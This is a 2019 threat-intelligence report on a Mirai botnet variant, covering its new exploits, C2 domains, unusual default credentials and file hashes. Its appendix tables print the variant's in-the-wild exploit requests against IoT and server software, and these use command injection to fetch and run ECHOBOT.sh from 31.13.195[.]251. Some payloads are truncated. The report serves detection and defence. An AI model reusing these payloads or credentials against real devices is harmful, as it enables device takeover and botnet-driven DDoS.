{
	"id": "8bceaff9-cb1f-4150-b7a6-41c037edc8b4",
	"created_at": "2026-04-06T00:13:05.70715Z",
	"updated_at": "2026-04-10T13:12:52.18894Z",
	"deleted_at": null,
	"sha1_hash": "c3e561edf834c9852ef28b08b205a04107848a78",
	"title": "New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 196240,
	"plain_text": "New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices\r\nBy Ruchna Nigam\r\nPublished: 2019-06-07 · Archived: 2026-04-05 15:03:46 UTC\r\nExecutive Summary\r\nPalo Alto Networks Unit 42 has been tracking the evolution of the Mirai malware, known for targeting embedded devices\r\nwith the primary intent of launching DDoS attacks and self-propagation, since 2016 when it took down several notable\r\ntargets.\r\nAs part of this ongoing research, we’ve recently discovered a new variant of Mirai that has eight new exploits against a wide\r\nrange of embedded devices. These newly targeted devices range from wireless presentation systems to set-top-boxes, SD-WANs, and even smart home controllers.\r\nMirai initially made use of default credentials to gain access to devices. However, since the end of 2017, samples of the\r\nfamily have increasingly been observed making use of publicly available exploits to propagate and run on vulnerable\r\ndevices.\r\n2018 saw a continued increase in the emergence of campaigns involving variants incorporating several exploits within the\r\nsame sample, allowing for the harvesting of several different kinds of IoT devices into the same botnet.\r\nSince then we have also observed Mirai malware authors experimenting with new exploits, found on the publicly available\r\nexploit-db, to gauge gains in bot count from the use of these exploits. This latest new variant we’ve observed and detailed in\r\nthis post appears to be a continuation of the same trend.\r\nExploits\r\nThis latest variant contains a total of 18 exploits, 8 of which are new to Mirai. The vulnerabilities being exploited in the wild\r\nby this new Mirai variant for the first time are listed below with more details in Table 1 in the Appendix:\r\nCVE-2019-3929\r\nOpenDreamBox Remote Code Execution\r\nCVE-2018-6961\r\nCVE-2018-7841\r\nCVE-2018-11510\r\nDell KACE Remote Code Execution\r\nCVE-2017-5174\r\nHooToo TripMate Remote Code Execution\r\nThe new samples also include four exploits which have only been used by Mirai in the past:\r\nLG Supersign TVs\r\nWePresent WiPG-1000 Wireless Presentation Systems\r\nBelkin WeMo devices\r\nMiCasaVerde VeraLite Smart Home Controllers\r\nThese new samples also include exploits targeting the Oracle WebLogic Servers RCE vulnerability which has been used by\r\nboth Linux and Windows botnets.\r\nAll of the exploits that have already been seen exploited by Mirai in the past have been listed in Table 3 in the Appendix.\r\nAnalysis\r\nThe new variant we have discovered also has other distinguishing features from the use of the exploits mentioned above.\r\nThe encryption key used for the string table is 0xDFDAACFD, which is the equivalent of a byte wise XOR with\r\n0x54, based on the standard encryption scheme (as implemented in the toggle_obf function) used in the original\r\nMirai source code.\r\nThere are several default credentials used for brute force we have not come across previously in our research (though\r\nwe cannot confirm this is their first use with Mirai). These are listed in Table 2 in the Appendix along with the\r\ndevices that make use of them - of note, all of these credentials can be found online.\r\nInfrastructure\r\nThe samples were available at an open directory pictured in Figure 1:\r\nhttps://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/\r\nPage 1 of 11\n\nFigure 1. Open directory hosting Mirai variant\r\nSamples of this variant use two domains for C2, at different ports in the different versions, as explained below.\r\nThe latest version makes use of the two domains below for C2.\r\nakuma[.]pw :17\r\nakumaiotsolutions[.]pw:912\r\nWhile the two domains don't currently resolve to any IP, a search on Shodan for the IP address hosting the samples, indicates\r\nport 17 at that address was used for C2 at some point of time. This is seen in the response recorded from port 17 in the\r\nscreenshot which is the expected response from a Mirai C2 server based on how the C2 code is written in the original source\r\ncode.\r\nFigure 2. Shodan search result indicating 31.13.195[.]251:17 was used for C2 at one point\r\nThe directory hosting the malware was updated a couple of times, before the final version was uploaded at 26-May-2019\r\n10:05 (server time). Each of the updates were minor where the attackers either edited C2 port numbers or slightly updated\r\nthe payload.\r\nFile upload times:\r\n26-May-2019 10:05\r\nhttps://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/\r\nPage 2 of 11\n\n21-May-2019 16:34\r\n21-May-2019 08:38\r\n19-May-2019 06:05\r\nThe briefly available version from May 21, 2019 at 08:38 made use of the below two domains for C2. They are the same\r\ndomains as used by the other samples (uploaded on prior or later dates) but the ports are different.\r\nakuma[.]pw:1822\r\nakumaiotsolutions[.]pw:721\r\nConclusion\r\nThis newly discovered variant is a continuation of efforts by Linux malware authors to scout for a wider range and thus,\r\nlarger number, of IoT devices to form larger botnets thereby affording them greater firepower for DDoS attacks. Based on\r\nthe results observed by using such variants, the exploits that are more effective i.e. the ones that infect a greater number of\r\ndevices are retained or reused in future variants whereas the less effective ones are retired or replaced by malware authors\r\nwith other exploits.\r\nPalo Alto Networks customers are protected by:\r\nWildFire which detects all related samples with malicious verdicts\r\nThreat Prevention and PANDB that block all exploits and IPs/URLs used by this variant.\r\nAutoFocus customers can track these activities using individual exploit tags:\r\nCVE-2019-3929\r\nOpenDreamBox_RCE\r\nCVE-2018-6961\r\nCVE-2018-7841\r\nCVE-2018-11510\r\nDellKACE_SysMgmtApp_RCE\r\nCVE-2017-5174\r\nHooTooTripMate_RCE\r\nBelkinWeMoRCE\r\nMiCasaVeraLiteRCE\r\nCVE-2018-17173\r\nWePresentCmdInjection\r\nASUS_DSLModem_RCE\r\nCVE-2019-2725\r\nNetgearReadyNAS_RCE\r\nCVE-2014-8361\r\nThe malware family can be tracked in AutoFocus using the tag Mirai.\r\nAppendix\r\nVulnerability\r\nAffected\r\nDevices\r\nExploit Format\r\nCVE-2019-\r\n3929\r\nWireless\r\nPresentation\r\nSystems from\r\nseveral vendors\r\n \r\nPOST /cgi-bin/file_transfer.cgi HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nfile_transfer=new\u0026dir='Pa_Notecd wget http://31.13.195[.]251/ECHOBOT.sh; curl -O\r\nhttp://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get\r\nECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod\r\nECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1\r\nECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.*Pa_Note\r\nhttps://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/\r\nPage 3 of 11\n\nOpenDreamBox\r\nRemote Code\r\nExecution\r\nDevices\r\nrunning\r\nOpenDreamBox\r\n2.0.0 - an\r\nembedded\r\nLinux\r\ndistribution for\r\nSet-Top-Boxes\r\nPOST /webadmin/script?command=|wget http://31.13.195[.]251/ECHOBOT.sh; curl -O\r\nhttp://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get\r\nECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod\r\nECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1\r\nECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.* HTTP/1.1\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nAccept: /\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\nCVE-2018-\r\n6961\r\nVMware NSX\r\nSD-WAN Edge\r\n\u003c 3.1.2\r\nPOST /scripts/ajaxPortal.lua HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: application/json, text/javascript, */*; q=0.01\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://www.vmware.com\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nCookie: culture=en-us\r\nConnection: close\r\ndestination=8.8.8.8$(wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; c\r\n777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh\r\nECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpg\r\nanonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1.sh ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf\r\nECHOBOT.*)\u0026source=192.168.0.1\u0026test=TRACEROUTE\u0026requestTimeout=900\u0026auth_token=\u0026_cmd=run_di\r\nname=google.com$(cat /etc/shadow |wget http://31.13.195[.]251/ECHOBOT.sh; curl -O\r\nhttp://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get\r\nECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod\r\nECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1\r\nECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf\r\nECHOBOT.*)\u0026test=DNS_TEST\u0026requestTimeout=90\u0026auth_token=\u0026_cmd=run_diagnostic\r\ndestination=8.8.8.8$(cat /etc/shadow |wget http://31.13.195[.]251/ECHOBOT.sh; curl -O\r\nhttp://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get\r\nECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod\r\nECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1\r\nECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf\r\nECHOBOT.*)\u0026source=192.168.0.1\u0026test=BASIC_PING\u0026requestTimeout=90\u0026auth_token=\u0026_cmd=run_diagn\r\nCVE-2018-\r\n7841\r\nSchneider\r\nElectric\r\nU.motion\r\nLifeSpace\r\nManagement\r\nSystems\r\nPOST /smartdomuspad/modules/reporting/track_import_export.php HTTP/1.1\r\nHost: 192.168.0.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0\r\nAccept: /\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: close\r\nCookie: PHPSESSID=l337qjbsjk4js9ipm6mppa5qn4\r\nhttps://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/\r\nPage 4 of 11\n\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 86\r\nop=export\u0026language=english\u0026interval=1\u0026object_id=\\x60wget http://31.13.195[.]251/ECHOBOT.sh; curl -O\r\nhttp://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get\r\nECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod\r\nECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1\r\nECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.*\\x60\r\nDell KACE\r\nRemote Code\r\nExecution\r\nDell KACE\r\nSystems\r\nManagement\r\nAppliances\r\nPOST /service/krashrpt.php HTTP/1.1\r\nHost: 192.168.0.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept: /\r\nUser-Agent: Hello-World\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: kboxid=r8cnb8r3otq27vd14j7e0ahj24\r\nConnection: close\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 37\r\nkuid=\\x60id | wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod\r\nECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh\r\nECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpg\r\nanonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1.sh ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf\r\nECHOBOT.*\\x60\r\nCVE-2017-\r\n5174\r\nGeutebrück IP\r\nCameras\r\nPOST /uapi-cgi/viewer/testaction.cgi HTTP/1.1\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nip: eth0 1.1.1.1; wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmo\r\nECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh\r\nECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpg\r\nanonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1.sh ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf\r\nECHOBOT.*\r\nAccept: /\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\nHooToo\r\nTripMate\r\nRemote Code\r\nExecution\r\nHooToo\r\nTripMate\r\nRouters\r\nPOST /protocol.csp?function=set\u0026fname=security\u0026opt=mac_table\u0026flag=close_forever\u0026mac=|wget\r\nhttp://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh;\r\nECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r\r\nECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p\r\nanonymous -P 21 31.13.195[.]251 ECHOBOT1.sh ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.* HT\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nAccept: /\r\nhttps://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/\r\nPage 5 of 11\n\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\nCVE-2018-\r\n11510\r\nAsustor NAS\r\nDevices\r\nTable 1. New exploits used in the Mirai variant\r\nDefault Credentials Affected Device(s)\r\nblueangel/blueangel\r\nroot/abnareum10\r\nroot/Admin@tbroad\r\nroot/superuser\r\nBlue Angel Software Suite, an application that runs on embedded devices for VOIP/SIP\r\nservices\r\nadmin/wbox123 WBOX IPCameras, NVRs, DVRs\r\nadmin/pfsense Netgate pfSense, an open source platform for traditional Firewall, VPN and Routing needs\r\nadmin/aerohive Aerohive devices, a networking hardware vendor\r\nroot/awind5885 Crestron AirMedia AM-100 Presentation Gateways\r\nhadoop/123456\r\nhadoop/hadoop@123\r\nhadoop/hadoopuser\r\nHadoop instances\r\nroot/ikwd Toshiba IP Cameras\r\nTable 2. Unusual default credentials used in the Mirai variant\r\nVulnerability\r\nAffected\r\nDevices\r\nExploit Format\r\nCVE-2019-2725 Oracle\r\nWebLogic\r\nServers\r\nPOST /_async/AsyncResponseServiceHttps HTTP/1.1\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nAccept-Language: en\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\r\nUser-Agent: Hello-World\r\nConnection: close\r\nhttps://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/\r\nPage 6 of 11\n\nContent-Type: text/xml\nxx xmlns:work=http://bea.com/2004/06/soap/worka\nwget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777\n31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21\n\u00261\n-c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251\nECHOBOT1.sh; rm -rf ECHOBOT.*; \u003e/tmp/f ;\u0026targetUri=/tmp/thumb/test.jpg\u0026mediaType=image\u0026targetW\nContent-Length: 630\nAccept-Encoding: gzip, deflate\nUser-Agent: Hello-World\nHost: 192.168.0.1:9080\nConnection: keep-alive\nWePresent\nCommand Injection\nWePresent\nWiPG-1000\nWireless\nPresentation\nsystems\nPOST /cgi-bin/rdfs.cgi HTTP/1.1\nHost: 192.168.0.1:80\napplication/x-www-form-urlencoded\nContent-Length: 1024 Client=;wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECH\nECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous\nASUS DSL Modem\nRemote Code\nExecution\nASUS DSL-N12E_C1\n1.1.2.3_345\nGET /Main_Analysis_Content.asp?\ncurrent_page=Main_Analysis_Content.asp\u0026next_page=Main_Analysis_Content.asp\u0026next_host=www.target.\ng987b580\u0026cmdMethod=ping\u0026destIP=wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]2\nECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous\nHost: 192.168.0.1:80\nConnection: keep-alive\nPragma: no-cache\nCache-Control: no-cache\nUpgrade-Insecure-Requests: 1\nConnection: keep-alive\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko)\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nReferer: http://www.target.com/Main_Analysis_Content.asp\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nBelkin WeMo\nRemote Code\nExecution\nBelkin\nWeMo\nDevices\nPOST /upnp/control/basicevent1 HTTP/1.1\nHost: 20.36.21.25:49152\nConnection: keep-alive\nAccept-Encoding: gzip, deflate Accept: */*\nUser-Agent: python-requests/2.18.4\nSOAPAction: urn:Belkin:service:basicevent:1#SetSmartDevInfo\nContent-Length: 393\nhttps://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/\nPage 7 of 11\n\n\u003c?xml version=1.0 encoding=utf-8?\u003e \u003cs:Envelope xmlns:s=http://schemas.xmlsoap.org/soap/envelope/ s:enco\r\nhttp://31.13.195[.]251/ECHOBOT.x -O /tmp/ECHOBOT; chmod 777 /tmp/ECHOBOT; /tmp/ECHOBOT belk\r\nMiCasa VeraLite\r\nRemote Code\r\nExecution\r\nMiCasa\r\nVeraLite\r\nSmart Home\r\nControllers\r\nPOST /upnp/control/hag HTTP/1.1\"\r\nHost: %s:49451\r\nAccept: text/javascript, text/html, application/xml, text/xml, */*\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nX-Requested-With: XMLHttpRequest\r\nX-Prototype-Version: 1.7\r\nContent-Type: text/xml;charset=UTF-8\r\nMIME-Version: 1.0\r\nContent-Length: 311\r\nConnection: keep-alive\r\nPragma: no-cache\r\nSOAPAction: urn:schemas-micasaverde-org:service:HomeAutomatio\r\nnGateway:1#RunLua\r\n\u003cs:Envelope s:encodingStyle=\r\nhttp://schemas.xmlsoap.org/soap/encoding/ xmlns:s=http://schemas.xmlsoap.org/soap/envelope/\"\u003e\u003cs:Body\u003e \u003c\r\nhttp://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.s\r\n777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHO\r\nNetgear ReadyNas\r\nRemote Code\r\nExecution\r\nNetgear\r\nReadyNas /\r\nNUUO\r\nNVRs\r\nPOST /upgrade_handle.php?cmd=writeuploaddir\u0026uploaddir=%27; wget http://31.13.195[.]251/ECHOBOT.sh\r\nECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh E\r\nECHOBOT.*%205;%27 HTTP/1.1\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nAccept: /\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\nGET /upgrade_handle.php?cmd=writeuploaddir\u0026uploaddir=%27; wget http://31.13.195[.]251/ECHOBOT.sh;\r\nECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh E\r\nHTTP/1.1\r\nHost: 192.168.0.1:50000\r\nConnection: keep-alive\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrom\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7\r\nCookie: PHPSESSID=7b74657ab949a442c9e440ccf050de1e; lang=en\r\nhttps://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/\r\nPage 8 of 11\n\nGoAhead Remote\r\nCode Execution\r\nIP cameras\r\nmanufactured\r\nby GoAhead,\r\nAldi, and\r\nseveral\r\nothers\r\nGET /set_ftp.cgi?next_url=ftp.htm\u0026loginuse=%s\u0026loginpas=%s\u0026svr=192\r\n.168.1.1\u0026port=21\u0026user=ftp\u0026pwd=$(wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]25\r\nECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous\r\nCVE-2014-8361\r\nDevices\r\nusing the\r\nRealtek SDK\r\nwith miniigd\r\ndaemon\r\nPOST /wanipcn.xml HTTP/1.1\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping'\r\nAccept: /\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\n\u003c?xml version=\"1.0\" ?\u003e\u003cs:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope//\" s:encodingStyle=\r\n\u003cNewRemoteHost\u003e\u003c/NewRemoteHost\u003e\u003cNewExternalPort\u003e47450\u003c/NewExternalPort\u003e\u003cNewProtocol\u003eTCP\u003c\r\nECHOBOT.mips; ./ECHOBOT.mips realtek\\x60\u003c/NewInternalClient\u003e\u003cNewEnabled\u003e1\u003c/NewEnabled\u003e\u003cNew\r\n\u003c/s:Envelope\u003e\r\nTable 3. Previously seen exploits used in the Mirai variant\r\nIndicators of Compromise\r\n26-May-2019 10:05 Samples\r\n13d3b4545b18f41cf89ad9d278434b3fb60a702edebdde605ced745db47ce58d\r\n22e33a16b03c2ca6b1e98b9c6fe1f1cc18d84eef4bb79247642ccf37960aaad8\r\n25e959a071e631088816ed87991482b8776a81377f0fa7a8f53eca9a7af3afe1\r\n2ad284d6297420e9cdb3a2bd9f0824c3122c861f37b58ea17675e0f5799f029e\r\n36b1391b84f48a0f3b20b3831250b681dfa4a5aeb7a26816da723a06991d5029\r\n73fe0ed1e85d547d19acd720b1d67fb94059a007a35f685b3bd16627879d4c47\r\n7d9af41abec8cc93a9185dfdb256b864fa5c9e67e16192f718d7faa0e18177e8\r\n95c7516abf8c738423cd18f0c905baa65d38ba5259b6853777550505019ba8cd\r\nb73add38713b70ca529c8387275fca0bbf5f5488f2be5ebc17c4f1f34b06bd26\r\ned4d920cd54b87167d0ad2256bf996c8fdac3ac3bd5dd5ccb0b6c2d551226184\r\nf02e2443c250e78877f9b184ab94693f4e8dba8c2191c9d03857664e71987976\r\nf9ee7e0a4deac908e6fbacf7baa4f1d3bb138ebe2a3f9236a61f5d764181df0a\r\n 21-May-2019 16:34 Samples\r\n228ca519054dd62aadfa360fcf8f74e3072a4f6ffde521e47db233a604320a16\r\n2f21e8ed1dce77c2cd0080c529043cff1c1ff5f22ba39dcd1a2220e17f273ba5\r\n3c26c9db539b3c1b556b86dff3c5b0e819dbdce52234dda7025979d05ff9d188\r\n65b03b40eafc60d0fa3b13c51dc1cfbc720e76d2a3b1f5f3c78de57856b8e60f\r\n68e62724530401400724a75dd2fe07dc0db6a8373be7861d65896b33039c632f\r\n81d63319951334eb8fb748d897a77f610d3250d795e0a134252e689f8db672c4\r\n8f6f3834d292ef84eada500832efea3c45a0fc0261bc4be8888414bfe31803c3\r\n9eebd384fa6d4d45648a74dfe0aad8fe2b9bc9b907e6f3b474ca77e83bbf63bb\r\nc282ad7bb6558cbdcb4e7c07db4a7f201792dd250a31718d811b78e34fd6a283\r\nhttps://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/\r\nPage 9 of 11\n\nd5ea253efcc042ee0a85ffdd4673738b5859ddacabca06dc2ff11f81b7d0983f\r\ndbf70f849e09441af668245f3ba7491be227447c36e7244bbbf2787e503599a7\r\n21-May-2019 08:38 Samples\r\n2dd89d8214c76b3ce7b6a301ad8256fba5ac9f3e4c0b3e10e14c6075764f0e4d\r\n5091da1a1fa51f77ac64f75ab9c23da88469160f040a189ec1e6a0e952a26720\r\n563afb05bb5a68c8b235143dde081c44e06ed2674681629c60116ce1b92a7cee\r\n61d18166f39ccdc85e51e9a6cd1a8ec7f8c1c1d227d84b9ca94ef847d0b1a79c\r\n6cdce7758468685f8c125bff2c3c1f196fe43f30e10c7fb643a67b7d5e2ae2f2\r\n83841e5f965cb7e03bf5f0c5da217a22b307ddd138a3b8b8ec5dc8f111f26165\r\n8ba26e98710f3e55677a7eaea19a656e3ef7136e94f81ecb5b05cfdc96586d65\r\n9476bfe1eb99b00c02a3a6c539d1a060b87e4c53617fa5b2949cdd44c1cbc92b\r\nb4443e1bbd27062c8eb2bfd791483a777ac003ce8d47a9ce43f2861f0ad70f94\r\nc2440a1e19ae8f527061a666fa59eb457f3c1c8f6d5b981f9c1f5bf8a4c62f61\r\nf64cad4ce4af8debf1951d4deca0dd86acd3a83409140cb0544ea27d155e04ab\r\n19-May-2019 06:05 Samples\r\n046a077bd3ded83b9066350862d204afb04dfe04b71827de8f60929e2f7d4e44\r\n0639e8111253133a617cd0f119c1ef70560de0f044add084c0200a1a4fd6952e\r\n098c7f9c8c8c63d8d79387274f0fe5416702abcb650b983426e116f193b82e61\r\n121e6d208522e1abccacd51f82f03a9178680c222eff5336b84b6f86a770a453\r\n5070aa62866652e533701ee327d6a77ec289cca0deae8fa953d69f9d12c89c55\r\n7ffb658d09c5c55c04ac1cef4e1e3c428c0363130381e0aef8c769ea11c64370\r\n87195d5262c205b3356cfe815d60d41a11a8f563b4cd4abd75da73128e02f86c\r\n9dc3e2fc27e138a588e6a25dc5432d78f0930046286fc64b9c65246beda19a45\r\nb3e5726e56f604656a322fc6c62585e73f594d053d6891c3fa94c3fff41f30cb\r\nb44b658716cf1326ad27e58b1a45c96684f6182d2a5d8596fb8fd7e60656a241\r\nb4a370ff3d59d43924ace6c8ef34df55b6e45b4dcff2f0f2db36bbb40e6c203e\r\nOther Samples with unknown in-the-wild URLs\r\n22ff3cc031c9ae43757030a1cb1a8fc09171f370469b79770faaca3eb5dbbfef\r\n385d26249622f65692423312846feed6eba96cea5d6e0bfbfa755307985cb8cd\r\n621e17811228b8ea559a2f6905235fcbcc59e7c06b9c380962aca3fcac15600c\r\n729d3b3363bd69b2cc60b9600ea91223361021f75b6f7484a49ead95a325b60c\r\n970783c2e358b1238f8e571989caf696f6af585dccad64dd21bf1703835b80d1\r\nbe7f56a58a908125ce2066fb0691d9f9eef868509a5d53f08e8362f21542b76c\r\ncb8b4d3d24607731cdffa7015eb6299373870c53a854b4a23657f8ede53113c6\r\ne8df1d766fc3763ffa79663920f47f158ec55605fdbf8bf5a55fcdcfe61be78d\r\ne94482b0382aa7907c41c329772085c288e55dd4b8ffd28277131d9ca9b2e9d2\r\n C2\r\nakuma[.]pw\r\nakumaiotsolutions[.]pw\r\nhttps://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/\r\nPage 10 of 11\n\nMalware URLs/Payload 